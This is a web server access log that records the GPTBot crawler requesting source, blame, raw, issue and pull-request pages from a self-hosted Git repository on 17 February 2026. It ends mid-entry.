"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36194] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33383] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33689] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11127] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11134] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33678] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13713] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13711] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13710] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10138] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:17:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10136] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:17:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10125] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:17:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10128] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" -[17/Feb/2026:17:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:17:34:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10130] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" -[17/Feb/2026:17:34:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 9960] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:17:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10128] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:17:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13647] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:17:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13646] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:17:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13645] [Gzip 7.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:17:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9958] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:17:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9957] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:17:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9956] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:17:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:17:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:17:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:17:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 9957] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:17:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10132] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:17:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 9960] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9954] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:17:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11837] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11839] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11837] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11035] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11839] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11839] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore?display=source" [Client 74.7.227.38] [Length 12443] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore" -[17/Feb/2026:17:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py" -[17/Feb/2026:17:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 74.7.227.38] [Length 11139] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:17:34:56 +0000] - 200 200 - GET https 